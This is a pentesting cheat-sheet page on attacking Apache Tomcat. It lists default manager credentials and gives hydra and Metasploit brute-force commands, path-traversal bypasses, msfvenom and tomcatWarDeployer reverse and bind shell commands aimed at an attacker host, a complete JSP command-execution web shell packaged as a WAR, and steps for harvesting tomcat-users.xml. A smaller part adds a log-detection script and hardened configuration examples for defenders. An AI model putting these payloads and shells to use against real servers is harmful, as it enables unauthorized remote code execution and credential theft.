
Tomcat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Find the vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, and finds issues across your whole technology stack, from APIs to web applications and cloud systems. Try it for free today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Discovery

  • It usually runs on port 8080
  • Common Tomcat error:

Enumeration

Version

```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
```

Locate the manager files

It is worth finding where the /manager and /host-manager pages live, because they may have been given different names. You can brute-force paths to search for them.

Username enumeration

In some versions prior to Tomcat 6 you can enumerate users:

```bash
msf> use auxiliary/scanner/http/tomcat_enum
```

Default credentials

The most interesting path in Tomcat is _/manager/html_: under this path you can upload and deploy war files (execute code). The path is protected by basic HTTP authentication, and the most common credentials are:

  • admin:admin
  • tomcat:tomcat
  • admin:<NOTHING>
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

You can test these and more credentials with:

```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```

Another interesting Tomcat path is /manager/status, where you can see the operating system and Tomcat versions. This is useful for finding vulnerabilities that affect the Tomcat version in use when you cannot access /manager/html.

Brute force

```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```

```bash
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>
```

Vulnerabilities

Password backtrace disclosure

Try to access /auth.jsp; if you are very lucky it may disclose the password in a backtrace.

Double URL encoding

A well-known vulnerability for reaching the application manager is mod_jk in CVE-2007-1860, which allows path traversal through double URL encoding.

To access the Tomcat management web, go to: pathTomcat/%252E%252E/manager/html

Note that to upload the webshell you may need to use the double URL encoding trick and send a cookie and/or an SSRF token.
To access the backdoor you may also need to use the double URL encoding trick.

/examples

The following sample scripts ship with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross-site scripting (XSS) injection (from here).

  • /examples/jsp/num/numguess.jsp
  • /examples/jsp/dates/date.jsp
  • /examples/jsp/snp/snoop.jsp
  • /examples/jsp/error/error.html
  • /examples/jsp/sessions/carts.html
  • /examples/jsp/checkbox/check.html
  • /examples/jsp/colors/colors.html
  • /examples/jsp/cal/login.html
  • /examples/jsp/include/include.jsp
  • /examples/jsp/forward/forward.jsp
  • /examples/jsp/plugin/plugin.jsp
  • /examples/jsp/jsptoserv/jsptoservlet.jsp
  • /examples/jsp/simpletag/foo.jsp
  • /examples/jsp/mail/sendmail.jsp
  • /examples/servlet/HelloWorldExample
  • /examples/servlet/RequestInfoExample
  • /examples/servlet/RequestHeaderExample
  • /examples/servlet/RequestParamExample
  • /examples/servlet/CookieExample
  • /examples/servlet/JndiServlet
  • /examples/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

Path traversal (..;/)

In some vulnerable Tomcat configurations you can gain access to protected directories in Tomcat by using the path: /..;/

So, for example, you may be able to reach the Tomcat manager page by requesting: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths with this trick is to request http://www.vulnerable.com/;param=value/manager/html
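From the defender's side, the brute-force, double-URL-encoding, /examples and ..;/ sections above all leave traces in Tomcat's access log. The following is an added detection example (not part of the original page) that walks constructed log lines in the default AccessLogValve "common" format and flags repeated 401s on /manager, requests that only resolve to /manager after decoding, the ..;/ and /;param=value/ tricks, and hits on the sample /examples apps. IP addresses, timestamps and the brute-force threshold are constructed values.

```python
"""Added detection example (not from the original page): flags the Tomcat manager
probing described above: repeated 401s on /manager (hydra / tomcat_mgr_login),
..;/ and double-encoded %252E%252E traversals, the /;param=/ variant, and /examples.
Log lines are constructed, in Tomcat's default AccessLogValve "common" format."""
import re
from collections import Counter
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /manager/html HTTP/1.1" 200 19023
10.0.0.9 - - [10/Oct/2023:14:01:02 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 19023
10.0.0.9 - - [10/Oct/2023:14:01:05 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 200 19023
10.0.0.9 - - [10/Oct/2023:14:01:09 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 19023
10.0.0.7 - - [10/Oct/2023:14:02:01 +0000] "GET /examples/servlet/SessionExample?x=1 HTTP/1.1" 200 1800
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
MANAGER_RE = re.compile(r'/(host-)?manager/')
TRICK_RE = re.compile(r'\.\.;/|/;[^/]*/|\.\./')  # ..;/ swallow, /;param=/ and plain ../

def normalize(raw_path: str) -> str:
    """Drop the query string and URL-decode twice so %252E%252E becomes '..'."""
    return unquote(unquote(raw_path.split('?', 1)[0]))

def analyze(log_text: str, brute_threshold: int = 3) -> dict:
    traversal, examples, failures, hits = [], [], Counter(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a "common"-format line: skip rather than guess
        ip, _method, raw_path, status = m.groups()
        raw, path = raw_path.split('?', 1)[0], normalize(raw_path)
        if MANAGER_RE.search(path):
            # Reaching /manager/ only after decoding, or via a path-parameter trick,
            # is not how a legitimate administrator opens the manager.
            if path != raw or TRICK_RE.search(raw):
                traversal.append((ip, raw))
            if status == '401':
                failures[ip] += 1
            elif status == '200' and failures[ip]:
                hits.add(ip)  # a success following failures: guessed credentials
        elif path.startswith('/examples/'):
            examples.append((ip, path))  # sample apps (info disclosure) still deployed
    return {'traversal': traversal, 'examples': examples,
            'brute_force': {ip: n for ip, n in failures.items() if n >= brute_threshold},
            'success_after_failures': sorted(hits)}
```

Run `analyze(SAMPLE_LOG)` to see one brute-force source with a success after its failures, three traversal attempts and one /examples hit; in production, feed it the AccessLogValve file and alert on any non-empty result.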

RCE

Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

Limitations

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script). Those details are usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (the path varies by version) (see the Post section).

```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
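As an added defensive counterpart to the roles described above (example configuration written for this page, not taken from the original or from the Tomcat project): the kind of tomcat-users.xml that makes the default-credential and WAR-deploy steps work, next to a hardened version, plus the manager's own context.xml restricting access by source address. The ops-gui and ci-deploy accounts and their password values are placeholders.

```xml
<!-- tomcat-users.xml as it is often found: a guessable password and one account
     that holds both the GUI role and the scripting (text interface) role. -->
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
</tomcat-users>

<!-- Hardened tomcat-users.xml: a separate account per role (the Tomcat manager docs
     advise against giving one user both manager-gui and manager-script), long random
     passwords (placeholders below), and no admin-* roles unless host-manager is in use. -->
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="ops-gui"   password="REPLACE_WITH_LONG_RANDOM_SECRET" roles="manager-gui"/>
  <user username="ci-deploy" password="REPLACE_WITH_LONG_RANDOM_SECRET" roles="manager-script"/>
</tomcat-users>

<!-- webapps/manager/META-INF/context.xml: only loopback may reach the manager, so a
     guessed password or a ..;/ or %252E%252E path trick sent from the network still
     gets a 403. Behind a reverse proxy Tomcat sees the proxy's address: add
     RemoteIpValve or deny /manager at the proxy as well. -->
<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
</Context>
```

If the manager application is not needed at all, deleting webapps/manager (and host-manager) removes every step in the RCE section above in one go.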

Metasploit

Metasploit is a widely used penetration testing tool for assessing and verifying the security of systems. It provides a set of powerful modules for discovering and exploiting vulnerabilities in systems, and can be used against web applications, operating systems, network devices and other targets.

One important Metasploit module type is the exploit module, which contains exploit code for many vulnerabilities. By choosing a suitable exploit module, a penetration tester can use a known vulnerability on the target system to obtain system privileges or execute arbitrary code.

Metasploit also provides payload modules, which perform a specific action on the target system. A payload can be a simple command or a full shell; the penetration tester chooses the payload that fits the objective.

Metasploit also supports post modules for post-exploitation actions on the target system, such as data collection, privilege escalation and persistent access.

In short, Metasploit is a powerful penetration testing tool that helps penetration testers discover and exploit vulnerabilities in systems and assess their security.

```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```

MSFVenom reverse shell

The MSFVenom tool is a powerful payload generator and encoder that is part of the Metasploit Framework. It allows you to create custom payloads for various exploits, including reverse shells.

To generate a reverse shell payload using MSFVenom, you can use the following command:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f war > shell.war
```

Replace <attacker IP> with your IP address and <attacker port> with the port number you want to use for the reverse shell connection.

This command will generate a Java Server Pages (JSP) payload that establishes a reverse TCP connection to your machine. The payload will be saved as a .war file named shell.war.

Once you have generated the payload, you can deploy it on a vulnerable server running Apache Tomcat or any other compatible web server. After successful deployment, you can trigger the reverse shell connection by accessing the deployed file through a web browser.

Remember to set up a listener on your machine to catch the incoming reverse shell connection. You can use tools like Netcat or Metasploit's multi/handler module for this purpose.

Keep in mind that using MSFVenom or any other hacking tool without proper authorization is illegal and unethical. Always ensure that you have the necessary permissions and legal rights before conducting any penetration testing activities.

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
```

Then, upload the revshell.war file and access it (/revshell/).

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this does not work (for example, old versions of Sun).

Download

```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```

Reverse shell

A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in post-exploitation scenarios to maintain persistent access to a compromised system.

To establish a reverse shell, the attacker typically needs to exploit a vulnerability in a network service running on the target machine. Once the vulnerability is exploited, the attacker can inject malicious code that establishes a connection back to their machine.

There are various tools and techniques available for creating reverse shells, including using netcat, Python, or Metasploit. The choice of tool depends on the specific requirements of the penetration test and the target environment.

It is important to note that the use of reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used in authorized penetration testing engagements or for educational purposes with proper consent and legal authorization.

```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```

Bind shell

A bind shell is a type of shell that allows an attacker to gain remote access to a compromised system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system.

To create a bind shell, the attacker needs to find a vulnerable service running on the target system that allows remote connections. One common target is the Apache Tomcat web server, which is often used to host Java-based web applications.

Once the attacker has identified a vulnerable service, they can exploit it to execute arbitrary commands on the target system. This can be done by injecting malicious code into the service or by exploiting a known vulnerability.

Once the attacker has gained access to the target system, they can use the bind shell to execute commands and interact with the system as if they were sitting in front of it. This can include tasks such as browsing files, modifying configurations, or even launching further attacks on other systems within the network.

It is important to note that using a bind shell to gain unauthorized access to a system is illegal and unethical. This information is provided for educational purposes only and should not be used for any malicious activities.

```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```

Using clusterd

```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```

Manual method - Web shell

Create a file named index.jsp with the following content:

```jsp
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
// Run the command passed in the "cmd" parameter and collect its standard output
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"<br/>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>
```

```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
# webshell.war is created
# Upload it
```

You can also install this one (it allows upload, download and command execution): http://vonloesch.de/filebrowser.html

Manual method 2

Get a JSP web shell such as this one and create a WAR file:

```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```

Post

The name of the Tomcat credentials file is tomcat-users.xml

```bash
find / -name tomcat-users.xml 2>/dev/null
```

Other ways to obtain Tomcat credentials:

```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```

Other Tomcat scanning tools
